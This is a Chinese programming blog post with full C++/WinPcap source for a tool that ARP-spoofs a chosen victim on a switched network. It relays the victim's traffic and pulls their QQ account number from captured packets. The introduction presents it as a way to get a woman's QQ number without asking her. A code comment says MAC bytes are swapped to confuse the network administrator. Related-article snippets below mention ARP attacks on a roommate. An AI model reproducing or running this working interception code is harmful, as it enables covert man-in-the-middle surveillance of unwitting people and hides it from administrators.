基于visual c++之windows核心编程代码分析(47)实现交换网络的QQ号嗅探

最新推荐文章于 2022-06-13 10:00:06 发布
最新推荐文章于 2022-06-13 10:00:06 发布
阅读量4k 收藏 1
点赞数 2
分类专栏: VC++编程技术 Visual C++2010编程技术 Visual Studio2012 Windows8 WindowsC++编程 文章标签: 代码分析 qq 编程 网络 windows c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itcastcpp/article/details/7214422
版权

当我们在一个交换网络里面,不知道别人的QQ号码是个很痛苦的事情,假如一个PLMM在上网,你却不知道她得QQ也没有勇气去问,是个很可惜的事情,

至于我们搞编程的,可以通过交换机的数据交换,嗅探出QQ号,因为QQ数据里面唯独QQ号码不加密。

 

 

#include "stdafx.h"
#include "pcap.h"
#include <stdio.h>
#include "Iphlpapi.h"
#include "protocol.h"

#pragma comment(lib,"wpcap.lib")
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib,"wsock32.lib")
#define PCAP_OPENFLAG_PROMISCUOUS 1

DWORD dwMyIp,dwGateIp,dwSubnet,dwDstIp;
UCHAR uMyMac[6],uGateMac[6],uDstMac[6];
pcap_t *adhandle;
int nCount = 0;//用于执行三次获取网关MAC的操作
bool bGateMac = true;
bool bDstMac = true;

void SendArpRequest(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uSrcMac[]);
int SendPacket(char *pBuffer, int nLen);

/* 每次捕获到数据包时,libpcap都会自动调用这个回调函数 */
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data)
{
    ETHeader *pETHdr = (ETHeader *)pkt_data;
	if(ntohs(pETHdr->type) == ETH_TYPE_ARP)
	{
		if(header->len < sizeof(ArpPacket)) return;
		ARPHeader *pArpHdr = (ARPHeader *)((char *)pkt_data+sizeof(ETHeader));
		if(ntohs(pArpHdr->opcode) == ARPOP_REPLY)
		{
			if(pArpHdr->daddr == dwMyIp && pArpHdr->saddr == dwGateIp && bGateMac)
			{
				if(nCount == 0)
				{
					memcpy(uGateMac,pArpHdr->smac,6);
					nCount ++;
				}else if(nCount == 3)//完成获取网关MAC
				{
					bGateMac = false;
					return;
				}else{
					if(!memcmp(uGateMac,pArpHdr->smac,6))
					{
						nCount ++;
					}else{
						nCount = 0;
					}
				}
				SendArpRequest(dwGateIp,dwMyIp,uMyMac);
			}
			if(pArpHdr->daddr == dwMyIp && pArpHdr->saddr == dwDstIp && bDstMac)
			{
				memcpy(uDstMac,pArpHdr->smac,6);
				bDstMac = false;
			}
		}
	}
	if(ntohs(pETHdr->type) == ETH_TYPE_IP)
	{
		IpHeader *pIpHdr = (IpHeader *)((char*)pkt_data+sizeof(ETHeader));
		if(pIpHdr->Protocol == PROTOCOL_UDP)
		{
			if(header->len < sizeof(ETHeader) + sizeof(IpHeader) + sizeof(UdpHeader)) return;
			UdpHeader *pUdpHdr = (UdpHeader *)((char*)pIpHdr+sizeof(IpHeader));
			if(ntohs(pUdpHdr->SrcPort) == 8000)
			{
				QQHeader *pQQHdr = (QQHeader *)((char*)pUdpHdr+sizeof(UdpHeader));
				if(pQQHdr->Flag != 0x02) return;//不是qq数据包
				UCHAR uQQ[4];
				memcpy(uQQ,pQQHdr->Data,4);
				DWORD dwQQ = 0;
				for(int i=0;i<4;i++)
				{
					dwQQ = dwQQ*256+uQQ[i];
				}
				printf("找到IP:%s的QQ号:%u\n",inet_ntoa(*(in_addr*)&pIpHdr->DstAddr),dwQQ);
			}
		}
		if(pIpHdr->DstAddr == dwDstIp && memcmp(pETHdr->dhost,uDstMac,6))//目的IP为要嗅探的IP,但是目的MAC不是对方的MAC
		{
			pETHdr->shost[5] ++;//源MAC不能设为网关MAC,否则会出现交换机欺骗,从而其它主机也无法上网
			memcpy(pETHdr->dhost,uDstMac,6);
			SendPacket((char*)pkt_data,header->len);
		}
	}
}


int SendPacket(char *pBuffer, int nLen)
{
	if(pcap_sendpacket(adhandle,(UCHAR *)pBuffer,nLen)) return 0;
	return 1;
}

void SendArpRequest(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uSrcMac[])
{
	ArpPacket *pArpPacket = new ArpPacket;
	for(int i =0;i<6;i++)
		pArpPacket->eth.dhost[i] = 0xFF;
	memcpy(pArpPacket->eth.shost,uSrcMac,6);
	pArpPacket->eth.type = ntohs(ETH_TYPE_ARP);
	pArpPacket->arp.hrd = ntohs(ARPHRD_ETHER);
	pArpPacket->arp.eth_type = ntohs(ETH_TYPE_IP);
	pArpPacket->arp.maclen = 6;
	pArpPacket->arp.iplen = 4;
	pArpPacket->arp.opcode = ntohs(ARPOP_REQUEST);
	memcpy(pArpPacket->arp.smac,uSrcMac,6);
	pArpPacket->arp.saddr = dwSrcIP;
	memset(pArpPacket->arp.dmac,0,6);
	pArpPacket->arp.daddr = dwDesIP;
	SendPacket((char*)pArpPacket,sizeof(ArpPacket));
	delete pArpPacket;
}

void SendArpReply(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uDesMac[], UCHAR uSrcMac[])
{
	ArpPacket *pArpPacket = new ArpPacket;
	memcpy(pArpPacket->eth.dhost,uDesMac,6);
	memcpy(pArpPacket->eth.shost,uSrcMac,6);
	pArpPacket->eth.type = ntohs(ETH_TYPE_ARP);
	pArpPacket->arp.hrd = ntohs(ARPHRD_ETHER);
	pArpPacket->arp.eth_type = ntohs(ETH_TYPE_IP);
	pArpPacket->arp.maclen = 6;
	pArpPacket->arp.iplen = 4;
	pArpPacket->arp.opcode = ntohs(ARPOP_REPLY);
	memcpy(pArpPacket->arp.smac,uSrcMac,6);
	pArpPacket->arp.saddr = dwSrcIP;
	memcpy(pArpPacket->arp.dmac,uDesMac,6);
	pArpPacket->arp.daddr = dwDesIP;
	SendPacket((char*)pArpPacket,sizeof(ArpPacket));
	delete pArpPacket;
}

int WINAPI MyThread(LPVOID Param)
{
//	Sleep(100);
	SendArpRequest(dwGateIp,dwMyIp,uMyMac);
	while(1)
	{
		if(bGateMac)
		{
			::Sleep(100);
			continue;
		}
		break;
	}
	printf("网关MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n",uGateMac[0],uGateMac[1],uGateMac[2],uGateMac[3],uGateMac[4],uGateMac[5]);
	printf("输入要嗅探的IP地址:");
	char ip[20];
	scanf("%s",ip);
	dwDstIp = inet_addr(ip);
	SendArpRequest(dwDstIp,dwMyIp,uMyMac);
	while(1)
	{
		if(bDstMac)
		{
			::Sleep(100);
			continue;
		}
		break;
	}
	printf("目标MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n",uDstMac[0],uDstMac[1],uDstMac[2],uDstMac[3],uDstMac[4],uDstMac[5]);
	printf("输入每秒发送欺骗包的个数:1-50\n");
	int nSpeed;
	scanf("%d",&nSpeed);
	UCHAR uMac[6]; 
	uMac[0] = uDstMac[0];
	uMac[1] = uDstMac[1];
	uMac[2] = uDstMac[3];
	uMac[3] = uDstMac[2];//交换MAC的第三和第四个字节,迷惑管理员
	uMac[4] = uDstMac[4];
	uMac[5] = uDstMac[5];
	while(1)
	{
		SendArpReply(dwGateIp,inet_addr(ip),uGateMac,uMac);
		Sleep(1000/nSpeed);
	}
	return 0;
}

int GetNetConfig(DWORD dwIp)
{
	PIP_ADAPTER_INFO pAdapterInfo = NULL;
	ULONG ulLen = 0;

	// 为适配器结构申请内存
	::GetAdaptersInfo(pAdapterInfo,&ulLen);
	pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);
	
	// 取得本地适配器结构信息
	if(::GetAdaptersInfo(pAdapterInfo,&ulLen) ==  ERROR_SUCCESS)
	{
		while(pAdapterInfo != NULL)
		{
			if(dwIp == inet_addr(pAdapterInfo->IpAddressList.IpAddress.String))
			{
				dwMyIp = dwIp;
				memcpy(uMyMac,pAdapterInfo->Address,6);
				dwSubnet = inet_addr(pAdapterInfo->IpAddressList.IpMask.String);
				dwGateIp = inet_addr(pAdapterInfo->GatewayList.IpAddress.String);
				//				CEther::SetGateWayAddr(inet_addr(pAdapterInfo->GatewayList.IpAddress.String),"");
				printf("本机IP地址为:%s\n本机MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n网关IP地址为:%s\n",
					pAdapterInfo->IpAddressList.IpAddress.String,
					uMyMac[0],uMyMac[1],uMyMac[2],uMyMac[3],uMyMac[4],uMyMac[5],
					pAdapterInfo->GatewayList.IpAddress.String);
				return 1;
			}
			pAdapterInfo = pAdapterInfo->Next;
		}
		return 0;
	}
	return -1;
}
int main(int argc, char* argv[])
{
	pcap_if_t *alldevs; 
	pcap_if_t *d; 
	int i = 0; 
	char errbuf[PCAP_ERRBUF_SIZE]; 
	
	/* Retrieve the device list from the local machine*/ 
	if (pcap_findalldevs(&alldevs, errbuf) == -1)  
	{ 
		printf("Error in pcap_findalldevs_ex: %s\n", errbuf); 
		exit(1); 
	} 
	
	/* Print the list */ 
	for (d = alldevs; d != NULL; d = d->next) 
	{ 
		/* Print the device’s name */ 
		printf("%d. %s", ++ i, d->name); 
		
		/* Print the device’s dscription */ 
		if (d->description) 
		{ 
			printf("(%s)\n", d->description); 
		} 
		else 
		{ 
			printf("(No description available)\n"); 
		} 
	} 
	
	if (i == 0) 
	{ 
		printf("\nNo interfaces found! Make sure WinPcap is installed.\n"); 
		return -1; 
	} 
	printf("Enter the interface number (1-%d):",i);
	int nIdx;
    scanf("%d", &nIdx);
    
    if(nIdx < 1 || nIdx > i)
    {
        printf("\nInterface number out of range.\n");
        /* 释放设备列表 */
        pcap_freealldevs(alldevs);
        return -1;
    }
    
    /* 跳转到选中的适配器 */
    for(d=alldevs, i=0; i< nIdx-1 ;d=d->next, i++);
    
    /* 打开设备 */
    if((adhandle= pcap_open_live(d->name,          // 设备名
		65536,            // 65535保证能捕获到不同数据链路层上的每个数据包的全部内容
		PCAP_OPENFLAG_PROMISCUOUS,    // 混杂模式
		10,             // 读取超时时间
		errbuf            // 错误缓冲池
		)) == NULL)
    {
        fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
        /* 释放设备列表 */
        pcap_freealldevs(alldevs);
        return -1;
    }
    
    printf("\nlistening on %s...\n", d->description);
    
	GetNetConfig(((sockaddr_in *)(d->addresses->addr))->sin_addr.S_un.S_addr);
    /* 释放设备列表 */
    pcap_freealldevs(alldevs);
    
	::CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)MyThread,NULL,0,0);
    /* 开始捕获 */
    pcap_loop(adhandle, 0, packet_handler, NULL);
	return 0;
}


 

C++实现网络编程---抓取网络数据包的实现方法
06-10
C++实现网络编程---抓取网络数据包的实现方法
c++ 获取本地ip和外网ip
lpl312905509的博客
06-29 1828
// ctest.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include <iostream> #include<stdio.h> #include <urlmon.h> #define MAX_SIZE 1024 #pragma comment(lib, "urlmon.lib") #pragma comment(lib,"ws2_32.lib") #include<windows.h> #include &lt
基于visual c++windows核心编程代码分析(37)实践信息安全隐患监测-嗅探
chengyixian7877的博客
03-09 66
嗅探器 可以窃听网络上流经的数据包。 用集线器hub组建的网络是基于共享的原理的, 局域网内所有的计算机都接收相同的数据包, 而网卡构造了硬件的“过滤器“ 通过识别MAC地址过滤掉和自己无关的信息, 嗅探程序只需关闭这个过滤器, 将网卡设置为“混杂模式“就可以进行嗅探交换机switch组建...
c++环境下qt+pcpp(winpcap)实现网络抓包(sniff)程序
qq490765184的博客
06-13 8300
本软件是利用c++语言基于Qt与PcapPlusPlus(以下简称PcPP)库在vs2019中开发的一个单一的windows应用。Qt是一个良好的跨平台界面设计库,简单易用,可移植性好;PcapPcapPlus是一个多平台的c++库,用于捕获、解析和制作网络数据包,功能强大,易于使用,简洁高效。本程序使用在开发过程中,利用异步抓包的方式,将ui线程作为主线程,抓包及数据处理线程作为子线程,保证用户体验的一个连贯性,同时,保证抓包的效率。软件的基本运行如下图所示:在运行本程序前,需要安装WinPcap 。在安
基于winpcap网络嗅探Visual C++ 语言源码+说明文档资料.zip
最新发布
04-25
基于winpcap网络嗅探Visual C++ 语言源码+说明文档资料,开发出一个 Windows 平台上的网络嗅探工具,能显示所捕获的数据包,并能 做相应的分析和统计。主要内容如下: 1、列出监测主机的所有网卡,选择一个网卡,...
MFC WinPcap编写一个嗅探器.zip_网络截获/分析_Visual_C++_
08-09
在本项目中,我们将利用Microsoft Foundation Class (MFC) 库和WinPcap库来创建一个网络嗅探器。这个嗅探器的主要目标是提供局域网(LAN)的探测和管理功能,使得网络管理员可以有效地监控和管理子网中的设备。通过这...
Sniff.rar_网络编程_Visual_C++_
08-12
网络编程Visual C++实现:揭秘Sniff网络嗅探器》 在信息技术领域,网络编程是至关重要的一环,它涉及到网络数据传输、协议解析、网络安全等诸多方面。Visual C++作为微软开发的一种强大的编程环境,提供了丰富...
protocol.rar_网络编程_Visual_C++_
08-11
在进行网络编程时,Visual C++可以用来创建基于Winsock API的网络应用程序,Winsock是Windows操作系统中用于网络通信的接口。 标题中的“protocol.rar”可能是一个包含源代码、文档和其他资源的压缩包,专注于网络...
网络嗅探器的设计与实现.zip
08-23
本文件为本科计算机网络的课设,内容为原创且全面,采用C ++代码实现,非常适用于本科的课设和平时的计算机网络的项目练习。课设里面包含内容有三大部分,分别为文档、代码实现和使用说明。文档部分含有背景介绍、...
socket,UDP发送ARP包(c++实现)
YellowTail
03-30 5078
内容可能和网上很多大神写的类似,我也没有什么创新的地方,全当写日记了,学了网络编程和计算机系统之后,觉得对IP数据包有了些了解,所以想尝试一下能不能写出局域网arp攻击工具出来.以下是思路1.先了解arp攻击 的原理, 攻击对象是我舍友,我想要让他不能正常上网,所以给他发送arp网关欺骗包,告诉网关的mac在2b-2b-2b-2b-2b-2b那里(肯定是不存在的啦), 他上网的时候由于找不到正
VC++实现交换网络QQ号嗅探
AJIOY的专栏
03-13 1078
当我们在一个交换网络里面,不知道别人的QQ号码是个很痛苦的事情,假如一个PLMM在上网,你却不知道她得QQ也没有勇气去问,是个很可惜的事情, 至于我们搞编程的,可以通过交换机的数据交换嗅探出QQ号,因为QQ数据里面唯独QQ号码不加密。 #include "stdafx.h" #include "pcap.h" #include #include "Iphlpapi.h" #incl
C++编程实现网络嗅探器原理与规划
"C++ 实现网络嗅探器规划文档主要介绍了如何使用C++编程语言设计和实现一个网络嗅探器。网络嗅探器是一种工具,它可以捕获并分析网络中的数据包,既可以用于网络安全分析,也可能被恶意利用。本文档详细阐述了嗅探器...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尹成

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值